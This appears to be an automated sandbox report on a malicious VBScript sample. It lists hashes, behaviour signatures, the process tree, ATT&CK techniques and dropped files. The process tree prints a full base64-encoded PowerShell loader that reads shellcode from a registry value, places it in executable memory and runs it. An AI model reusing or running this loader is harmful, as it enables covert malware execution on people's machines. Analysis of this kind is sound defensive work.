Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 21:12

General

  • Target

    Hvilested.vbs

  • Size

    135KB

  • MD5

    36b1f36ea9b9752a8af52202daeebfd3

  • SHA1

    a3e4e48fe2c1897930dce07e758e1e590a00d2ad

  • SHA256

    8b4d69556cd93e5b27c7fdc3a7e765fcb6f45ebd8451ee4e9fa9a515aac6811d

  • SHA512

    d3172ec500241d744319495b585d558ffd625f767f333d1751b1fa6fa25401db8253bd97892a91e994cffbad0df1925f0f6abdb7bb61fff0b1b2cd6ed59da466

  • SSDEEP

    1536:TjeOZx8kZRMuKPheRTHNo2rNo8EgnxTwBII9zLKFisRxcyeC2X2qCLmob8OVPeVv:TKwtAWTBRnxTbvcoU0L78OVGvUc

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Hvilested.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAEUARwBJAFYAIABBAGYAcwBhAGEAYgBsAGEAbgBrADkAIABrAG8AbgBuAGUAawBzAGkAIABSAEUARQBWAE8ASwBFAFMAUwBIACAAUwBLAFUATQAgAHMAcABvAG8AbgBoACAAYgByAGQAcgAgAGEAbgB0AGkAZgBvAHIAZQBpACAARgBpAGoAaQA2ACAAbwB1AHQAYwBoAGEAcgBtACAAcQB1AGEAcgB0AGUAcgAgAEYAZQByAHQAaQAgAEoAbwByAGQAcwBwAGUAawAyACAAQgByAG8AbgB6AGkANgAgAEQAQQBUAEEAQgAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8ANQAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA2ACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvADcALABpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8AOAAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAbABlAGUAcAAoAHUAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADAALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQAsAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgAyACwAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADMALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAG8AbQBtAGUAcgBwAGUAbABvADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAHAAbwBtAG0AZQByAHAAZQBsAG8AMgAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwAzACkAOwAJAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFoAdwBBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABGAHIAcwB0AGUAbQBhAG4AZABzACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBTAEEATgBHAFUASQBOACwAaQBuAHQAIABQAGUAcgBzADEALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANwApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAZgBsAG8AcwBrAHUAbAAgAHAAYQBjAGUAbQAgAFMAdAByAGsAYgA0ACAARABFAEYAQQBDACAAUwB1AHAAcgBhADUAIABkAGUAbgBvAHQAYQB0AGkAIAB0AHYAYQBuAGcAcwBmAGoAZQAgAEUAcgBpAGMAYQBzAHAAbwAgAHMAbgBlAGIAcgBzACAAVQBkAHMAawB5AGQAbgBpAG4AZwA1ACAAUgBlAGEAcwBvACAAQQBsAGIAaQBuAGkAcwBtADEAIABpAG4AZgBhAGwAbABpAGIAIABDAGgAYQBtAHAAYQBnAG4AZQAgAFIAdQBzAHMAZQByACAAUwBFAE4ATgBJAEcASABUAFMAIABHAGEAbABsAGkAYwBtAGUAdAA1ACAARAB2AHIAZwBwAGkAbABlADUAIAB2AGkAbgBkAHIAdQBlACAATQBhAGcAaQBzAHQAIABuAG8AbgByACAAcgBpAGEAbABpAG4AZAAgAFMAVABVAE4ATgBJAE4ARwAgAEwAYQBhAG4AZQBmAG8AbgBkAGUAIABGAE8AUwBUAEUAUgBIAE8ATwAgAFYASQBPAEwAQQBTAFQAQQBOAEUAIAAgAA0ACgAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwA9ADAAOwANAAoAJABOAE8ATgBTAEEATgBHAFUASQBOADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATgBPAE4AUwBBAE4ARwBVAEkATgA4AD0AWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAWgB3AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACwAMAAsAFsAcgBlAGYAXQAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwARgBPAFIASwAiACkALgBOAFUAQwBMAEUAQQBUAA0ACgANAAoAJABTAFYAVQBMAE0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAQQBmAGcAcgBmAHQAZQBkAGUAbgA0AC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAFMAVgBVAEwATQBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAFQAZQBsAGUAcwBrAHIAaQA9ADAAOwAgACQAVABlAGwAZQBzAGsAcgBpACAALQBsAHQAIAAkAFMAVgBVAEwATQAuAGMAbwB1AG4AdAAgADsAIAAkAFQAZQBsAGUAcwBrAHIAaQArACsAKQANAAoAewANAAoACQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACsAJABUAGUAbABlAHMAawByAGkALABbAHIAZQBmAF0AJABTAFYAVQBMAE0AWwAkAFQAZQBsAGUAcwBrAHIAaQBdACwAMQApAA0ACgANAAoAfQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3il0f5re\3il0f5re.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5000
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AC0.tmp" "c:\Users\Admin\AppData\Local\Temp\3il0f5re\CSC704202B644A545E7B5DFF46974B45017.TMP"
          4⤵
            PID:3108

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3il0f5re\3il0f5re.dll
      Filesize

      3KB

      MD5

      6dcf2f0906109a34b9c5a544cad81769

      SHA1

      5a7bf0948d889d04ebfff24b08739d99d2b4bca8

      SHA256

      b451aa863ebab25359aaadf90e85b35162eafbf1e0d82ee479cdc503f9edbd26

      SHA512

      cde6534b7235c97a8832ab428e3800f470a657cbaa87d1bca6dc17cb01b398673a4a7b437e8d767bf04423e8c5ef142fa0a6d3852258ddf21a0f9e715a3aa1a4

    • C:\Users\Admin\AppData\Local\Temp\RES4AC0.tmp
      Filesize

      1KB

      MD5

      d856be58d006567d3ed509ee110bf839

      SHA1

      e31e781ff878b840bb3d9ec6c336d423ac3f9958

      SHA256

      7b2bc5e4e3790ffce9cab0bf8165c05a29afabfebeabc08c6ac5e8ab93783ddb

      SHA512

      01ef2dfc3025fb3fc790d4f25a2e72459d09c1e657367795e16b995b8383bfdc14068747c2637e6ee1d45fbe72a651690f98277ec36bfc86fd01f77126de926f

    • \??\c:\Users\Admin\AppData\Local\Temp\3il0f5re\3il0f5re.0.cs
      Filesize

      695B

      MD5

      064a6660e679021cfee85dc594d08ce8

      SHA1

      7c10b7ef48bbb535100943dc90b6aeeaa59e428a

      SHA256

      6ff92c6c4cb841339ce2b5ca496dcafb35f345eca6d401abf3c081bf5f74757b

      SHA512

      152654d72902a5d50469d57ec4fb80a2494f402665956503c7864d52ac140300ff01e66ffe653db9bfe7955377875f25e9d90c4809c5c188002ad08685764162

    • \??\c:\Users\Admin\AppData\Local\Temp\3il0f5re\3il0f5re.cmdline
      Filesize

      369B

      MD5

      de1724783623c45131fa70916540dc89

      SHA1

      197dfc8c875f2065afa3bdbbe926bec5250044b9

      SHA256

      b1cff697ef2c0da25127905f701d8eb40f1af012bbf381984638748eb41f964e

      SHA512

      df514781bf57b60cc6e595fecdf2d174cc8b9b4ce0a33cda993db03a20813a6e03d9266d544670d1391a943dd0ecaaa07540893e072d4bb6d37065add504ca9c

    • \??\c:\Users\Admin\AppData\Local\Temp\3il0f5re\CSC704202B644A545E7B5DFF46974B45017.TMP
      Filesize

      652B

      MD5

      ec9372ae2716257720381a9aba1c1bdf

      SHA1

      b8eb351ae48be2062dfa5728ad75f91cc0f9e143

      SHA256

      ea60622553a15a42c58a1a2019cb587727a9abd6c1309d5214e2ec8b4a8a623d

      SHA512

      f1cb3d17b12f7bd67d1251d06b8fa5b3ee3eb5f18c3bb93edb2fac0fda67e1db40a1ab86156521974112bc604ae0af1948e1a0f27b07102cfb4b12b35bcaa722

    • memory/1944-148-0x0000000007A90000-0x0000000007B26000-memory.dmp
      Filesize

      600KB

    • memory/1944-135-0x00000000056D0000-0x00000000056F2000-memory.dmp
      Filesize

      136KB

    • memory/1944-139-0x0000000007F70000-0x00000000085EA000-memory.dmp
      Filesize

      6.5MB

    • memory/1944-140-0x0000000006C30000-0x0000000006C4A000-memory.dmp
      Filesize

      104KB

    • memory/1944-137-0x0000000005FF0000-0x0000000006056000-memory.dmp
      Filesize

      408KB

    • memory/1944-132-0x0000000000000000-mapping.dmp
    • memory/1944-138-0x0000000006680000-0x000000000669E000-memory.dmp
      Filesize

      120KB

    • memory/1944-152-0x00000000078F0000-0x0000000007F6A000-memory.dmp
      Filesize

      6.5MB

    • memory/1944-151-0x00000000078F0000-0x0000000007F6A000-memory.dmp
      Filesize

      6.5MB

    • memory/1944-134-0x0000000005730000-0x0000000005D58000-memory.dmp
      Filesize

      6.2MB

    • memory/1944-133-0x00000000050A0000-0x00000000050D6000-memory.dmp
      Filesize

      216KB

    • memory/1944-136-0x0000000005ED0000-0x0000000005F36000-memory.dmp
      Filesize

      408KB

    • memory/1944-149-0x0000000007A20000-0x0000000007A42000-memory.dmp
      Filesize

      136KB

    • memory/1944-150-0x0000000008BA0000-0x0000000009144000-memory.dmp
      Filesize

      5.6MB

    • memory/3108-144-0x0000000000000000-mapping.dmp
    • memory/5000-141-0x0000000000000000-mapping.dmp